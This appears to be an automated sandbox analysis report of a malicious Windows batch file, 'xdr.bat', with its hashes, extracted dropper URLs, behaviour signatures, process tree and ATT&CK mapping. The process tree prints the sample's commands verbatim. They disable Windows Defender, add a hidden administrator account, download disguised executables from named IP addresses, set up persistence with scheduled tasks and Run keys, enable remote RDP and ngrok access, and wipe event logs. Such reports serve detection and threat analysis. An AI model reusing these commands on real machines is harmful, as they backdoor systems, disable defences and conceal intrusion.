Overview

overview

10

Static

static

1

xdr.bat

windows10-1703-x64

10

xdr.bat

windows7-x64

10

xdr.bat

windows10-2004-x64

10

xdr.bat

windows10-ltsc 2021-x64

10

xdr.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24/10/2024, 17:40

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    xdr.bat

  • Size

    4KB

  • MD5

    9e779d369e3ca17fdc894d13c4fd797a

  • SHA1

    bf7e34e0da33a587177e66cfcec51f3aa75b4a87

  • SHA256

    15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

  • SHA512

    ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1

  • SSDEEP

    96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistencetrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.yml

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/x222.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/WindowsUpdate.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/auto-install-hrdp.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/hrdp.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/update.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/autoupdate.zip

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
    evasiontrojan
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in System32 directory 2 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
    defense_evasion
  • Drops file in Program Files directory 3 IoCs
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2400
    • C:\Windows\system32\cmd.exe
      cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\net.exe
        net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
        3⤵
          PID:2824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'c:\'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2376
      • C:\Windows\system32\net.exe
        net user t1 Raed12346@@ /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user t1 Raed12346@@ /add
          3⤵
            PID:2276
        • C:\Windows\system32\net.exe
          net localgroup administrators t1 /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1992
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators t1 /add
            3⤵
              PID:1748
          • C:\Windows\system32\net.exe
            net localgroup Administrat├╢rer t1 /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1652
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administrat├╢rer t1 /add
              3⤵
                PID:2296
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
              2⤵
              • Hide Artifacts: Hidden Users
              PID:1508
            • C:\Windows\system32\net.exe
              net user t1 /active:no
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2860
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user t1 /active:no
                3⤵
                  PID:1872
              • C:\Windows\system32\net.exe
                net user t1 /active:yes
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1744
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user t1 /active:yes
                  3⤵
                    PID:2040
                • C:\Windows\system32\ReAgentc.exe
                  reagentc.exe /disable
                  2⤵
                  • Drops file in System32 directory
                  PID:2852
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
                  2⤵
                    PID:1004
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
                    2⤵
                      PID:2356
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
                      2⤵
                        PID:2576
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
                        2⤵
                          PID:1384
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
                          2⤵
                            PID:2348
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                            2⤵
                              PID:2980
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                              2⤵
                              • Modifies Windows Defender Real-time Protection settings
                              PID:1832
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
                              2⤵
                                PID:1756
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:1424
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:476
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:968
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:400
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2172
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1296
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2020
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1052
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1548
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2340
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata\*.*
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:552
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:1268
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3024
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1416
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2012
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:2244
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:1512
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2464
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C C:\ProgramData\Windata\installer.bat
                                      2⤵
                                      • Drops file in Program Files directory
                                      PID:1420
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:876
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1604
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C C:\ProgramData\Windata\hrdp\install.bat
                                        3⤵
                                          PID:2672
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2692
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2708
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "update.zip" -DestinationPath "."
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2560
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2596
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
                                          3⤵
                                            PID:2120
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
                                            3⤵
                                              PID:2188
                                            • C:\Windows\system32\cmd.exe
                                              cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
                                              3⤵
                                                PID:2184
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
                                                3⤵
                                                  PID:2056
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
                                                2⤵
                                                  PID:1976

                                              Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Reconnaissance

                                                    Resource Development

                                                    Initial Access

                                                    Execution

                                                    Command and Scripting Interpreter

                                                    1
                                                    T1059

                                                    PowerShell

                                                    1
                                                    T1059.001

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Scheduled Task

                                                    1
                                                    T1053.005

                                                    Persistence

                                                    Account Manipulation

                                                    1
                                                    T1098

                                                    Boot or Logon Autostart Execution

                                                    1
                                                    T1547

                                                    Registry Run Keys / Startup Folder

                                                    1
                                                    T1547.001

                                                    Create or Modify System Process

                                                    1
                                                    T1543

                                                    Windows Service

                                                    1
                                                    T1543.003

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Scheduled Task

                                                    1
                                                    T1053.005

                                                    Privilege Escalation

                                                    Account Manipulation

                                                    1
                                                    T1098

                                                    Boot or Logon Autostart Execution

                                                    1
                                                    T1547

                                                    Registry Run Keys / Startup Folder

                                                    1
                                                    T1547.001

                                                    Create or Modify System Process

                                                    1
                                                    T1543

                                                    Windows Service

                                                    1
                                                    T1543.003

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Scheduled Task

                                                    1
                                                    T1053.005

                                                    Defense Evasion

                                                    Hide Artifacts

                                                    3
                                                    T1564

                                                    Hidden Files and Directories

                                                    2
                                                    T1564.001

                                                    Hidden Users

                                                    1
                                                    T1564.002

                                                    Impair Defenses

                                                    1
                                                    T1562

                                                    Disable or Modify Tools

                                                    1
                                                    T1562.001

                                                    Modify Registry

                                                    2
                                                    T1112

                                                    Credential Access

                                                    Discovery

                                                    Permission Groups Discovery

                                                    1
                                                    T1069

                                                    Local Groups

                                                    1
                                                    T1069.001

                                                    Query Registry

                                                    1
                                                    T1012

                                                    Lateral Movement

                                                    Collection

                                                    Command and Control

                                                    Exfiltration

                                                    Impact

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\ProgramData\Windata\hrdp.zip
                                                      Filesize

                                                      1.5MB

                                                      MD5

                                                      0220e75b22e87585fa065121761e9e2d

                                                      SHA1

                                                      3c2b019c4bde007ffca05bca8b75ad3951a4a9a0

                                                      SHA256

                                                      6acb1127d03b01b533501943a559e2ef33be1788cbf9b64d5617ae5ccba92446

                                                      SHA512

                                                      fc15b01b0e13f0288f49e70c5294a3643dda73edd2ed48697b61f0f445379e189a41d626e650644f50e71d04543a67d68592f7ce4d057e6eeaa5aff25ce1bc07

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      5436bdde4896ff1d65ee10660892363f

                                                      SHA1

                                                      55711d4b1cea7ff2fa942531ba61f450f262eb19

                                                      SHA256

                                                      5302e514684c2fce1041c7ff3a0bca1878983c337246d1ed595f3ace2121cdff

                                                      SHA512

                                                      0ad33987d63912d6279075e67753c23734fdd58bfbff18dcf26580c18136c39c39add9992a0f9177193fdc14dc37d0463dc5763afdfb7c343d852a1f24e8e298

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      6bcf2033ebc52a15d740e3da3dc1f07a

                                                      SHA1

                                                      886b90681a80606bf2d8f2ef02effeff65e568fe

                                                      SHA256

                                                      9867a2b0cce14a94e6541af5c029e6105d7a76aeb35e4b02e4b714303ecf879d

                                                      SHA512

                                                      0db4869d8634091b9e0c0cf3c4807e7bd4bfc896ac1dda2e77090517d6bee1c548412d44cd3d25030ff5b3ace53fa11f66073336352253e959f1ce76b4092b09

                                                      Download Submit

                                                    • C:\programdata\Windata\installer.bat
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      895d7ba924e93cefffa7fa4bc0cac6f2

                                                      SHA1

                                                      68313bc29146cd23caf4dded3100225d4d0f26a6

                                                      SHA256

                                                      c24c176aab99728a62179a4eb95af90f80e48c59884e258d8c454de26bfa2dd8

                                                      SHA512

                                                      aaf1c5c43937a42bd1eb49df5ac6a2a76ea2c9f0c74cb52ca7ac6f332aa191b99a50fdf31ef97a0a6b995c0f187c15cd2cdce925b368926dba8190073f20f450

                                                      Download Submit

                                                    • C:\programdata\Windata\ngrok.zip
                                                      Filesize

                                                      8.4MB

                                                      MD5

                                                      ef99156228bf3926729f9682cef708e9

                                                      SHA1

                                                      7e02bd51e5be7e98454434c030e6cc583876f63b

                                                      SHA256

                                                      dc28f606067f7fe980c033c27d7365ed761dce0ad398095e495fdfd26e0b4f51

                                                      SHA512

                                                      033bd685dd744c5de93be64d221a41d06224261a28401d7a125db4824c22814eb410903a162e946fcc3dfe386b164759c276dc6b264c307cfdf295441f28cef1

                                                      Download Submit

                                                    • C:\programdata\Windata\winlogin.exe
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      9e497a3855c86b45e07ed23710683de1

                                                      SHA1

                                                      c9baae1a87fef165e9942119fb19631a2cbda8d8

                                                      SHA256

                                                      54b9b8048365c9705d5b39c638c7ce5599a93685b2a44020ede883185409bb9f

                                                      SHA512

                                                      da79293ea0a508ea3db40d6041d4d3d414772e32962eaae627e4a750b21872bb50a930bd6c97da86c18cd060e6fd9c3b746e396141ba7b1e38ca8596c5ed84b6

                                                      Download Submit

                                                    • memory/2400-47-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/2400-7-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/2400-8-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/2400-4-0x000007FEF468E000-0x000007FEF468F000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2400-9-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/2400-10-0x0000000002DDB000-0x0000000002E42000-memory.dmp

                                                      Filesize

                                                      412KB

                                                      Download

                                                    • memory/2400-5-0x000000001B720000-0x000000001BA02000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                      Download

                                                    • memory/2400-6-0x0000000002910000-0x0000000002918000-memory.dmp

                                                      Filesize

                                                      32KB

                                                      Download

                                                    • memory/2560-16-0x000000001B690000-0x000000001B972000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                      Download

                                                    • memory/2560-17-0x00000000003F0000-0x00000000003F8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                      Download